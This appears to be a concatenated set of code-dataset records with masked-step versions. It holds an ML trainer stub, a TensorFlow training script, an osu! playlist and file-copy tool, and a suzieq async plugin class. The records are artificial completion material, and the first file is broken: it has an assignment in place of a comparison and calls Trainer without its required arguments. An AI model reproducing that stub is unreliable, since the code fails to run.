# # o o # 8 # .oPYo. .oPYo. odYo. o8P o8 .oPYo. odYo. .oPYo. .oPYo. # Yb.. 8oooo8 8' `8 8 8 8oooo8 8' `8 8 ' 8oooo8 # 'Yb. 8. 8 8 8 8 8. 8 8 8 . 8. # `YooP' `Yooo' 8 8 8 8 `Yooo' 8 8 `YooP' `Yooo' # :.....::.....:..::..::..::..:.....:..::..:.....::.....: # ::::::::::::::::::::::::::::::::::::::::::::::::::::::: # ::::::::::::::::::::::::::::::::::::::::::::::::::::::: # # Copyright Yazan Obeidi, 2017 # # python.learning.learn - single interface for learning # from src.python.utils.log import init_log from src.python.utils.config import init_config from src.python.learning.models import Model __author__ = 'yazan' __version__ = '0.0.1' __licence__ = 'Apache V2' class Trainer(object): """Consumes data/dataset in streamable or batch format and trains a single model in the available catalogue. """ def __init__(self, log, config, model_handle, model_schema): """:params: model_handle: a model object, i.e. a RandomForest clf handler model_schema: reference to the library for that model, i.e. sklearn """ self.log = log self.config = config self.model = model_handle self.schema = model_schema def train(self): pass @property def score(self): pass if __name__ = '__main__': log = init_log() config = init_config() trainer = Trainer(log=log, config=config)
normal
{ "blob_id": "c6357e6e0656388fc3fd849879aa6000e0bee1ee", "index": 1553, "step-1": "#\n# o o \n# 8 \n# .oPYo. .oPYo. odYo. o8P o8 .oPYo. odYo. .oPYo. .oPYo. \n# Yb.. 8oooo8 8' `8 8 8 8oooo8 8' `8 8 ' 8oooo8 \n# 'Yb. 8. 8 8 8 8 8. 8 8 8 . 8. \n# `YooP' `Yooo' 8 8 8 8 `Yooo' 8 8 `YooP' `Yooo' \n# :.....::.....:..::..::..::..:.....:..::..:.....::.....:\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::\n# :::::::::::::::::::::::::::::::::::::::::::::::::::::::\n#\n# Copyright Yazan Obeidi, 2017\n#\n# python.learning.learn - single interface for learning\n#\n\nfrom src.python.utils.log import init_log\nfrom src.python.utils.config import init_config\nfrom src.python.learning.models import Model\n\n__author__ = 'yazan'\n__version__ = '0.0.1'\n__licence__ = 'Apache V2'\n\nclass Trainer(object):\n \"\"\"Consumes data/dataset in streamable or batch format\n and trains a single model in the available catalogue.\n \"\"\"\n def __init__(self, log, config, model_handle, model_schema):\n \"\"\":params:\n model_handle: a model object, i.e. a RandomForest clf handler\n model_schema: reference to the library for that model, i.e. sklearn\n \"\"\"\n self.log = log\n self.config = config\n self.model = model_handle\n self.schema = model_schema\n\n def train(self):\n pass\n\n @property\n def score(self):\n pass\n\n\nif __name__ = '__main__':\n log = init_log()\n config = init_config()\n trainer = Trainer(log=log, config=config)", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import tensorflow as tf import csv from tensorflow.keras import layers from tensorflow.keras.layers.experimental import preprocessing import pandas as pd import numpy as np import random import matplotlib.pyplot as plt import math def plot_loss(history): plt.plot(history.history['loss'], label='loss') plt.plot(history.history['val_loss'], label='val_loss') plt.ylim([0, 10]) plt.xlabel('Epoch') plt.ylabel('Error') plt.legend() plt.grid(True) #get data outputs=[] inputs=[] with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\actions.csv',newline='') as csvfile: reader=csv.reader(csvfile,dialect='excel') for x in reader: outputs.append(x) with open('C:\\Users\\owenb\\Desktop\\experiment results\\agent3_data\\messages_3_2.csv',newline='') as csvfile: reader=csv.reader(csvfile,dialect='excel') for x in reader: inputs.append(x) dataset=[[inputs[x],outputs[x]] for x in range(len(inputs))] del dataset[8500:] #process data length=int(len(dataset)*0.8) train_dataset=random.sample(dataset,length) test_dataset=[y for y in dataset if y not in train_dataset] train_features=[x[0] for x in train_dataset] train_labels=[x[1] for x in train_dataset] test_features=[x[0] for x in test_dataset] test_labels=[x[1] for x in test_dataset] for x in range(len(train_features)): train_features[x]=np.array(np.expand_dims([float(y) for y in train_features[x]], axis=0)) train_labels[x]=np.array(np.expand_dims([float(y) for y in train_labels[x]], axis=0)) train_features=np.array(train_features) train_labels=np.array(train_labels) for x in range(len(test_features)): test_features[x]=np.array(np.expand_dims([float(y) for y in test_features[x]], axis=0)) test_labels[x]=np.array(np.expand_dims([float(y) for y in test_labels[x]], axis=0)) test_features=np.array(test_features) test_labels=np.array(test_labels) #make model #message=tf.keras.Input(shape=(1,100)) #predictor_layer=tf.keras.layers.Dense(6,activation='relu',use_bias=True)(message) #linear_model=tf.keras.Model(inputs=message,outputs=predictor_layer) normalizer=preprocessing.Normalization(input_shape=(1, 100)) normalizer.adapt(train_features) linear_model=tf.keras.Sequential([normalizer,tf.keras.layers.Dense(6)]) linear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),loss='mean_absolute_error') #train model history = linear_model.fit(x=train_features, y=train_labels, epochs=100,verbose=0,validation_split = 0.2) plot_loss(history) #test model test_results = linear_model.evaluate(test_features, test_labels, verbose=1) print("agent 3-2 post train error="+str(test_results)) linear_model.save('agent3-2.h5')
normal
{ "blob_id": "196147d7b2b0cf7176b5baa50d7e7618f88df493", "index": 7911, "step-1": "<mask token>\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\n<mask token>\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',\n newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n outputs.append(x)\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv'\n , newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n inputs.append(x)\n<mask token>\ndel dataset[8500:]\n<mask token>\nfor x in range(len(train_features)):\n train_features[x] = np.array(np.expand_dims([float(y) for y in\n train_features[x]], axis=0))\n train_labels[x] = np.array(np.expand_dims([float(y) for y in\n train_labels[x]], axis=0))\n<mask token>\nfor x in range(len(test_features)):\n test_features[x] = np.array(np.expand_dims([float(y) for y in\n test_features[x]], axis=0))\n test_labels[x] = np.array(np.expand_dims([float(y) for y in test_labels\n [x]], axis=0))\n<mask token>\nnormalizer.adapt(train_features)\n<mask token>\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),\n loss='mean_absolute_error')\n<mask token>\nplot_loss(history)\n<mask token>\nprint('agent 3-2 post train error=' + str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-3": "<mask token>\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\noutputs = []\ninputs = []\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',\n newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n outputs.append(x)\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv'\n , newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n inputs.append(x)\ndataset = [[inputs[x], outputs[x]] for x in range(len(inputs))]\ndel dataset[8500:]\nlength = int(len(dataset) * 0.8)\ntrain_dataset = random.sample(dataset, length)\ntest_dataset = [y for y in dataset if y not in train_dataset]\ntrain_features = [x[0] for x in train_dataset]\ntrain_labels = [x[1] for x in train_dataset]\ntest_features = [x[0] for x in test_dataset]\ntest_labels = [x[1] for x in test_dataset]\nfor x in range(len(train_features)):\n train_features[x] = np.array(np.expand_dims([float(y) for y in\n train_features[x]], axis=0))\n train_labels[x] = np.array(np.expand_dims([float(y) for y in\n train_labels[x]], axis=0))\ntrain_features = np.array(train_features)\ntrain_labels = np.array(train_labels)\nfor x in range(len(test_features)):\n test_features[x] = np.array(np.expand_dims([float(y) for y in\n test_features[x]], axis=0))\n test_labels[x] = np.array(np.expand_dims([float(y) for y in test_labels\n [x]], axis=0))\ntest_features = np.array(test_features)\ntest_labels = np.array(test_labels)\nnormalizer = preprocessing.Normalization(input_shape=(1, 100))\nnormalizer.adapt(train_features)\nlinear_model = tf.keras.Sequential([normalizer, tf.keras.layers.Dense(6)])\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),\n loss='mean_absolute_error')\nhistory = linear_model.fit(x=train_features, y=train_labels, epochs=100,\n verbose=0, validation_split=0.2)\nplot_loss(history)\ntest_results = linear_model.evaluate(test_features, test_labels, verbose=1)\nprint('agent 3-2 post train error=' + str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-4": "import tensorflow as tf\nimport csv\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport math\n\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n\noutputs = []\ninputs = []\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',\n newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n outputs.append(x)\nwith open(\n 'C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv'\n , newline='') as csvfile:\n reader = csv.reader(csvfile, dialect='excel')\n for x in reader:\n inputs.append(x)\ndataset = [[inputs[x], outputs[x]] for x in range(len(inputs))]\ndel dataset[8500:]\nlength = int(len(dataset) * 0.8)\ntrain_dataset = random.sample(dataset, length)\ntest_dataset = [y for y in dataset if y not in train_dataset]\ntrain_features = [x[0] for x in train_dataset]\ntrain_labels = [x[1] for x in train_dataset]\ntest_features = [x[0] for x in test_dataset]\ntest_labels = [x[1] for x in test_dataset]\nfor x in range(len(train_features)):\n train_features[x] = np.array(np.expand_dims([float(y) for y in\n train_features[x]], axis=0))\n train_labels[x] = np.array(np.expand_dims([float(y) for y in\n train_labels[x]], axis=0))\ntrain_features = np.array(train_features)\ntrain_labels = np.array(train_labels)\nfor x in range(len(test_features)):\n test_features[x] = np.array(np.expand_dims([float(y) for y in\n test_features[x]], axis=0))\n test_labels[x] = np.array(np.expand_dims([float(y) for y in test_labels\n [x]], axis=0))\ntest_features = np.array(test_features)\ntest_labels = np.array(test_labels)\nnormalizer = preprocessing.Normalization(input_shape=(1, 100))\nnormalizer.adapt(train_features)\nlinear_model = tf.keras.Sequential([normalizer, tf.keras.layers.Dense(6)])\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),\n loss='mean_absolute_error')\nhistory = linear_model.fit(x=train_features, y=train_labels, epochs=100,\n verbose=0, validation_split=0.2)\nplot_loss(history)\ntest_results = linear_model.evaluate(test_features, test_labels, verbose=1)\nprint('agent 3-2 post train error=' + str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-5": "import tensorflow as tf\nimport csv\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.layers.experimental import preprocessing\nimport pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport math\n\ndef plot_loss(history):\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.ylim([0, 10])\n plt.xlabel('Epoch')\n plt.ylabel('Error')\n plt.legend()\n plt.grid(True)\n\n#get data\n\noutputs=[]\ninputs=[]\n\nwith open('C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\actions.csv',newline='') as csvfile:\n reader=csv.reader(csvfile,dialect='excel')\n for x in reader:\n outputs.append(x)\n\nwith open('C:\\\\Users\\\\owenb\\\\Desktop\\\\experiment results\\\\agent3_data\\\\messages_3_2.csv',newline='') as csvfile:\n reader=csv.reader(csvfile,dialect='excel')\n for x in reader:\n inputs.append(x)\n\ndataset=[[inputs[x],outputs[x]] for x in range(len(inputs))]\n\ndel dataset[8500:]\n\n#process data\n\nlength=int(len(dataset)*0.8)\ntrain_dataset=random.sample(dataset,length)\ntest_dataset=[y for y in dataset if y not in train_dataset]\n\ntrain_features=[x[0] for x in train_dataset]\ntrain_labels=[x[1] for x in train_dataset]\n\ntest_features=[x[0] for x in test_dataset]\ntest_labels=[x[1] for x in test_dataset]\n\nfor x in range(len(train_features)):\n train_features[x]=np.array(np.expand_dims([float(y) for y in train_features[x]], axis=0))\n train_labels[x]=np.array(np.expand_dims([float(y) for y in train_labels[x]], axis=0))\n\ntrain_features=np.array(train_features)\ntrain_labels=np.array(train_labels)\n\nfor x in range(len(test_features)):\n test_features[x]=np.array(np.expand_dims([float(y) for y in test_features[x]], axis=0))\n test_labels[x]=np.array(np.expand_dims([float(y) for y in test_labels[x]], axis=0))\n\ntest_features=np.array(test_features)\ntest_labels=np.array(test_labels)\n\n#make model\n\n#message=tf.keras.Input(shape=(1,100))\n#predictor_layer=tf.keras.layers.Dense(6,activation='relu',use_bias=True)(message)\n#linear_model=tf.keras.Model(inputs=message,outputs=predictor_layer)\n\nnormalizer=preprocessing.Normalization(input_shape=(1, 100))\nnormalizer.adapt(train_features)\nlinear_model=tf.keras.Sequential([normalizer,tf.keras.layers.Dense(6)])\n\nlinear_model.compile(optimizer=tf.optimizers.Adam(learning_rate=0.001),loss='mean_absolute_error')\n\n#train model\n\nhistory = linear_model.fit(x=train_features, y=train_labels, epochs=100,verbose=0,validation_split = 0.2)\n\nplot_loss(history)\n\n#test model\n\ntest_results = linear_model.evaluate(test_features, test_labels, verbose=1)\n\n\nprint(\"agent 3-2 post train error=\"+str(test_results))\nlinear_model.save('agent3-2.h5')\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import os import shutil import configparser beatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA']+'\\osu!\\Songs\\') beatmaps = [] bm_osu = [] with os.scandir(os.path.abspath(beatmap_dir)) as it: for entry in it: if entry.is_dir(): try: beatmap_id = int(str(entry.name).split(' ')[0]) except ValueError: # I'm not sure what to do about unranked maps right now, we will exclude them continue beatmaps.append(entry.path) beatmap_type = { "id": 0, # You may parse for "[Metadata]\n\nBeatmapSetID:{sid}" (WARN: Earlier maps will lack this parameter (osu file format v3 < osu file format v14)) or use the one provided with path "name": 'Author - Title', # I should get it from osu files rather than directory, but that's how it happens "audio": ".\\somefile.mp3", # Parse for "[General]\n\nAudioFilename: {filename}" | DONE "video": ".\\something.mp4" # Parse for "[Events]\n\nVideo,{timestamp},{filename}" (found mp4,avi,mpg) | plz check, TODO } for beatmap in beatmaps: with os.scandir(os.path.abspath(beatmap)) as it: bm = { 'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]), 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(beatmap)[1]).split(' ')[0])+1:], 'audio': None, 'audio_length': None, 'video': None } print('{} {}'.format(bm['id'], bm['name'])) for entry in it: if entry.is_file(): if entry.path.endswith('osu'): # ConfigParser is actually overkill solution, although I set it up to work # FixMe: This solution does not account for multiple (via diff) maps in one # Although, ranked maps should never have this. with open(entry.path, 'r', encoding="utf-8") as f: config_string = '[global]\n' + f.read() a = '' for x in config_string.split('\n')[:config_string.split('\n').index('[Events]')-1]: a += x+'\n' config = configparser.ConfigParser(allow_no_value=True) config.read_string(a) # TODO: Rewrite to simple checks and add video checking. bm['audio'] = os.path.abspath(os.path.dirname(entry.path)+'\\'+config.get('General', 'AudioFilename')) elif entry.path.endswith('mp4') or entry.path.endswith('avi') or entry.path.endswith('mpg'): bm['video'] = entry.path bm_osu.append(bm) text_playlist = "" for bm in bm_osu: if bm['audio']: text_playlist += "#EXTINF:0,{0}\n{1}\n".format(bm['name'], bm['audio']) text_playlist = text_playlist[:-1] try: with open('osu.m3u', 'w', encoding='utf-8') as file: file.write(text_playlist) except: open('osu.m3u', 'x') with open('osu.m3u', 'w', encoding='utf-8') as file: file.write(text_playlist) text_type = "" for bm in bm_osu: if bm['name']: text_type += "{0}\n".format(bm['name']) text_type = text_type[:-1] try: with open('osu.txt', 'w', encoding='utf-8') as file: file.write(text_type) except: open('osu.txt', 'x') with open('osu.txt', 'w', encoding='utf-8') as file: file.write(text_type) for bm in bm_osu: if bm['audio']: print('{} {}'.format(bm['id'], bm['name'])) if os.path.basename(bm['audio']).split('.')[-1] != '': shutil.copy2(bm['audio'], "{}\\osu music\\{}.{}".format(os.getcwd(), bm['name'], os.path.basename(bm['audio']).split('.')[-1])) if bm['video']: shutil.copy2(bm['video'], "{}\\osu music\\{}.{}".format(os.getcwd(), bm['name'], os.path.basename(bm['video']).split('.')[-1])) print('done, ty for use')
normal
{ "blob_id": "cd34f9ef100ae6d116f02258d22c114ec3f3e3e6", "index": 1581, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n continue\n beatmaps.append(entry.path)\n<mask token>\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(\n beatmap)[1]).split(' ')[0]) + 1:], 'audio': None,\n 'audio_length': None, 'video': None}\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n with open(entry.path, 'r', encoding='utf-8') as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split\n ('\\n').index('[Events]') - 1]:\n a += x + '\\n'\n config = configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n bm['audio'] = os.path.abspath(os.path.dirname(entry.\n path) + '\\\\' + config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi'\n ) or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\n<mask token>\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += '#EXTINF:0,{0}\\n{1}\\n'.format(bm['name'], bm['audio'])\n<mask token>\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\n<mask token>\nfor bm in bm_osu:\n if bm['name']:\n text_type += '{0}\\n'.format(bm['name'])\n<mask token>\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nfor bm in bm_osu:\n if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], '{}\\\\osu music\\\\{}.{}'.format(os.\n getcwd(), bm['name'], os.path.basename(bm['audio']).split(\n '.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], '{}\\\\osu music\\\\{}.{}'.format(os.getcwd(),\n bm['name'], os.path.basename(bm['video']).split('.')[-1]))\nprint('done, ty for use')\n", "step-3": "<mask token>\nbeatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA'] + '\\\\osu!\\\\Songs\\\\')\nbeatmaps = []\nbm_osu = []\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n continue\n beatmaps.append(entry.path)\nbeatmap_type = {'id': 0, 'name': 'Author - Title', 'audio':\n '.\\\\somefile.mp3', 'video': '.\\\\something.mp4'}\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(\n beatmap)[1]).split(' ')[0]) + 1:], 'audio': None,\n 'audio_length': None, 'video': None}\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n with open(entry.path, 'r', encoding='utf-8') as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split\n ('\\n').index('[Events]') - 1]:\n a += x + '\\n'\n config = configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n bm['audio'] = os.path.abspath(os.path.dirname(entry.\n path) + '\\\\' + config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi'\n ) or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\ntext_playlist = ''\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += '#EXTINF:0,{0}\\n{1}\\n'.format(bm['name'], bm['audio'])\ntext_playlist = text_playlist[:-1]\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\ntext_type = ''\nfor bm in bm_osu:\n if bm['name']:\n text_type += '{0}\\n'.format(bm['name'])\ntext_type = text_type[:-1]\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nfor bm in bm_osu:\n if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], '{}\\\\osu music\\\\{}.{}'.format(os.\n getcwd(), bm['name'], os.path.basename(bm['audio']).split(\n '.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], '{}\\\\osu music\\\\{}.{}'.format(os.getcwd(),\n bm['name'], os.path.basename(bm['video']).split('.')[-1]))\nprint('done, ty for use')\n", "step-4": "import os\nimport shutil\nimport configparser\nbeatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA'] + '\\\\osu!\\\\Songs\\\\')\nbeatmaps = []\nbm_osu = []\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n continue\n beatmaps.append(entry.path)\nbeatmap_type = {'id': 0, 'name': 'Author - Title', 'audio':\n '.\\\\somefile.mp3', 'video': '.\\\\something.mp4'}\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(\n beatmap)[1]).split(' ')[0]) + 1:], 'audio': None,\n 'audio_length': None, 'video': None}\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n with open(entry.path, 'r', encoding='utf-8') as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split\n ('\\n').index('[Events]') - 1]:\n a += x + '\\n'\n config = configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n bm['audio'] = os.path.abspath(os.path.dirname(entry.\n path) + '\\\\' + config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi'\n ) or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\ntext_playlist = ''\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += '#EXTINF:0,{0}\\n{1}\\n'.format(bm['name'], bm['audio'])\ntext_playlist = text_playlist[:-1]\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\ntext_type = ''\nfor bm in bm_osu:\n if bm['name']:\n text_type += '{0}\\n'.format(bm['name'])\ntext_type = text_type[:-1]\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nfor bm in bm_osu:\n if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], '{}\\\\osu music\\\\{}.{}'.format(os.\n getcwd(), bm['name'], os.path.basename(bm['audio']).split(\n '.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], '{}\\\\osu music\\\\{}.{}'.format(os.getcwd(),\n bm['name'], os.path.basename(bm['video']).split('.')[-1]))\nprint('done, ty for use')\n", "step-5": "import os\nimport shutil\nimport configparser\n\nbeatmap_dir = os.path.abspath(os.environ['LOCALAPPDATA']+'\\\\osu!\\\\Songs\\\\')\nbeatmaps = []\nbm_osu = []\n\nwith os.scandir(os.path.abspath(beatmap_dir)) as it:\n for entry in it:\n if entry.is_dir():\n try:\n beatmap_id = int(str(entry.name).split(' ')[0])\n except ValueError:\n # I'm not sure what to do about unranked maps right now, we will exclude them\n continue\n beatmaps.append(entry.path)\n\nbeatmap_type = {\n \"id\": 0, # You may parse for \"[Metadata]\\n\\nBeatmapSetID:{sid}\" (WARN: Earlier maps will lack this parameter (osu file format v3 < osu file format v14)) or use the one provided with path\n \"name\": 'Author - Title', # I should get it from osu files rather than directory, but that's how it happens\n \"audio\": \".\\\\somefile.mp3\", # Parse for \"[General]\\n\\nAudioFilename: {filename}\" | DONE\n \"video\": \".\\\\something.mp4\" # Parse for \"[Events]\\n\\nVideo,{timestamp},{filename}\" (found mp4,avi,mpg) | plz check, TODO\n}\n\nfor beatmap in beatmaps:\n with os.scandir(os.path.abspath(beatmap)) as it:\n bm = {\n 'id': int(str(os.path.split(beatmap)[1]).split(' ')[0]),\n 'name': str(os.path.split(beatmap)[1])[len(str(os.path.split(beatmap)[1]).split(' ')[0])+1:],\n 'audio': None,\n 'audio_length': None,\n 'video': None\n }\n print('{} {}'.format(bm['id'], bm['name']))\n for entry in it:\n if entry.is_file():\n if entry.path.endswith('osu'):\n # ConfigParser is actually overkill solution, although I set it up to work\n # FixMe: This solution does not account for multiple (via diff) maps in one\n # Although, ranked maps should never have this.\n with open(entry.path, 'r', encoding=\"utf-8\") as f:\n config_string = '[global]\\n' + f.read()\n a = ''\n for x in config_string.split('\\n')[:config_string.split('\\n').index('[Events]')-1]:\n a += x+'\\n'\n config = configparser.ConfigParser(allow_no_value=True)\n config.read_string(a)\n # TODO: Rewrite to simple checks and add video checking.\n bm['audio'] = os.path.abspath(os.path.dirname(entry.path)+'\\\\'+config.get('General', 'AudioFilename'))\n elif entry.path.endswith('mp4') or entry.path.endswith('avi') or entry.path.endswith('mpg'):\n bm['video'] = entry.path\n bm_osu.append(bm)\n\n\ntext_playlist = \"\"\nfor bm in bm_osu:\n if bm['audio']:\n text_playlist += \"#EXTINF:0,{0}\\n{1}\\n\".format(bm['name'], bm['audio'])\n\ntext_playlist = text_playlist[:-1]\n\ntry:\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\nexcept:\n open('osu.m3u', 'x')\n with open('osu.m3u', 'w', encoding='utf-8') as file:\n file.write(text_playlist)\n\ntext_type = \"\"\nfor bm in bm_osu:\n if bm['name']:\n text_type += \"{0}\\n\".format(bm['name'])\ntext_type = text_type[:-1]\ntry:\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\nexcept:\n open('osu.txt', 'x')\n with open('osu.txt', 'w', encoding='utf-8') as file:\n file.write(text_type)\n\nfor bm in bm_osu:\n if bm['audio']:\n print('{} {}'.format(bm['id'], bm['name']))\n if os.path.basename(bm['audio']).split('.')[-1] != '':\n shutil.copy2(bm['audio'], \"{}\\\\osu music\\\\{}.{}\".format(os.getcwd(), bm['name'], os.path.basename(bm['audio']).split('.')[-1]))\n if bm['video']:\n shutil.copy2(bm['video'], \"{}\\\\osu music\\\\{}.{}\".format(os.getcwd(), bm['name'], os.path.basename(bm['video']).split('.')[-1]))\n\n\n\nprint('done, ty for use')", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from abc import abstractmethod from suzieq.shared.sq_plugin import SqPlugin class InventoryAsyncPlugin(SqPlugin): """Plugins which inherit this class will have methods 'run' Once the controller check that the object inherit this class, it launches a new task executing the run method. """ async def run(self): """Background task to launch in order to execute the plugin""" try: await self._execute() finally: await self._stop() @abstractmethod async def _execute(self): """Launch the backuground task """ async def _stop(self): """Actions to execute before terminating the task """ return
normal
